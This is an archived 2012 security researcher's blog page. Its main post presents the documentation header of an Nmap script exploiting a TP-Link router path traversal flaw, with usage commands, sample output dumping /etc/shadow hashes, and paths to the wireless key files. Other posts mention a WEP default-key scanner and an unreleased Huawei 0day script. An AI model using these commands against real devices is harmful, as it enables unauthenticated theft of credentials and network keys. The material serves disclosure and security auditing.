calderonpale.com

network ninja
  • Home
  • About
  • Contact

http-tplink-dir-traversal

by Paulino Calderon on Tue, Jul 10 2012 05:18:00

I wrote a NSE script to exploit a path traversal vulnerability in several TP-Link access points.

description = [[
Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
This vulnerability was confirmed in models WR740N, WR740ND and WR2543ND but there are several models that use the same HTTP server so I believe they could be vulnerable as well. I appreciate
any help confirming the vulnerability in other models.
Advisory:
* http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
Other interesting files:
* /tmp/topology.cnf (Wireless configuration)
* /tmp/ath0.ap_bss (Wireless encryption key)
]]
---
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse <target>
-- @usage nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse <target>
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn <target>
--
-- @output
-- PORT STATE SERVICE REASON
-- 80/tcp open http syn-ack
-- | http-tplink-dir-traversal:
-- | VULNERABLE:
-- | Path traversal vulnerability in several TP-Link wireless routers
-- | State: VULNERABLE (Exploitable)
-- | Description:
-- | Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
-- | This vulnerability can be exploited remotely and without authenticatication.
-- | Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
-- | Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
-- | Disclosure date: 2012-06-18
-- | Extra information:
-- | /etc/shadow :
-- |
-- | root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- | Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- | bin::10933:0:99999:7:::
-- | daemon::10933:0:99999:7:::
-- | adm::10933:0:99999:7:::
-- | lp:*:10933:0:99999:7:::
-- | sync:*:10933:0:99999:7:::
-- | shutdown:*:10933:0:99999:7:::
-- | halt:*:10933:0:99999:7:::
-- | uucp:*:10933:0:99999:7:::
-- | operator:*:10933:0:99999:7:::
-- | nobody::10933:0:99999:7:::
-- | ap71::10933:0:99999:7:::
-- |
-- | References:
-- |_ http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
--
-- @args http-tplink-dir-traversal.rfile Remote file to download. Default: /etc/passwd
-- @args http-tplink-dir-traversal.outfile If set it saves the remote file to this location.

 

Resources 

http-tplink-dir-traversal on Github

dotdotpwn log

Posted in Nmap, Code | 2 Comments

Nuevo release de HHG5XX

by Paulino Calderon on Wed, Jun 20 2012 16:09:00

Descarga HHG5XX

http://calderonpale.com/mac2wepkey.hhg5xxv3.apk

https://play.google.com/store/apps/details?id=mx.websec.mac2wepkey.hhg5xx

13 Comments

The good old days - HHG5XX Free

by Paulino Calderon on Wed, May 23 2012 03:25:00

hhg5xx free stats

Posted in Android | 18 Comments

Presentacion de GuadalajaraCON 2012

by Paulino Calderon on Sun, May 06 2012 23:00:00

Este pasado 21 de Abril tuve dí una platica sobre escaneo distribuido en GuadalajaraCON 2012. Hicimos el release de una versión especial para este evento de la herramienta Dnmap. Pueden descargar la presentación y el software desde los siguiente links:

http://www.guadalajaracon.org/wp-content/uploads/2012/04/GuadalajaraCONNmapDistribuidoSlides.pdf

http://guadalajaracon.org/dnmap.tar.gz

Posted in Nmap, Announcements | 18 Comments

Taller de desarrollo NSE de BugCON 2012

by Paulino Calderon on Tue, May 01 2012 22:48:00

Aquí les comparto el material de mi taller de desarrollo NSE que dí en BugCON 2012. Incluye recursos, ejemplos, slides y hasta un script no publico aún para explotar un 0day en modems Huawei:

https://www.dropbox.com/s/xrj6gghbksnqiua/BUGCON--NMAP-NSE.zip

Manden sus comentarios para mejorar el material.

Posted in Nmap | 13 Comments
2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10

My online accounts

  • LinkedIN profile
  • My Github profile
  • Follow me on twitter

My mobile applications

  • HHG5XX default WEP key scanner
  • Mac2wepkey HHG5XX (HHG5XX default WEP key scanner FREE)
  • BCBus - BCTransit schedules for android
  • Routerpwn port
  • IP2Hosts
  • LectorBunsen

Nmap 6: Network Exploration and Security Auditing Cookbook

Advertise your product in my applications

  • Anunciate en HHG5XX

Free security audits for open source projects

  • Websec Mexico
  • Websec Canada

@calderpwn

Tweets by @calderpwn

Recent Posts

  • Taller de GuadalajaraCON 2013: Desarrollando para el Nmap Scripting Engine
  • Taller "Búsqueda de vulnerabilidades en aplicaciones Android"
  • (IN)seguridad en infraestructura tecnológica - FLISOL Querétaro
  • mac2wepkey hhg5xx version 11
  • Mis talleres en GuadalajaraCON 2013
  • Taller de busqueda de vulnerabilidades en aplicaciones Android en BugCON 2013
  • Mac2wepkey HHG5XX version 10 is out
  • year=2012; year++;
  • Mi libro ya esta disponible en Mexico
  • Nmap 6: Network Exploration and Security Auditing Cookbook has been published!
  • Discount code for "Nmap 6: Network Exploration and Security Auditing Cookbook"
  • The evolution of Nmap
  • Websec en el Hacker Halted USA 2012
  • Websec en el Security Zone 2012
  • Nueva versión de mac2wepkey HHG5XX para Android

Tags

  • Web security
  • Advisories
  • Code
  • Tutorials
  • Computer Science
  • Android
  • Metasploit
  • BCBus
  • Nmap
  • CakePHP

Links

  • Websec Mexico
  • Websec Canada
  • Hakim.ws
  • Security Dojo
  • ip2hosts.com
  • Tr3w's Blog
  • Brain Overflow
  • Chatsubo Labs
  • Alt3kx's Blog
  • Blog de Alevsk
  • WebAdictos
  • Arduino Projects FIUADY
  • Bugcon
  • Blog de Antonio Toriz
  • Cozumel Jeep Rentals
  • Resrever.net (Read backwards)
  • Bonsaiviking's Blog
  • GuadalajaraCON
  • Flisol Queretaro
  • Comunidad Underground de Mexico

Meta

  • Site Admin
  • Entries (RSS)
  • Comments (RSS)
Powered by Croogo.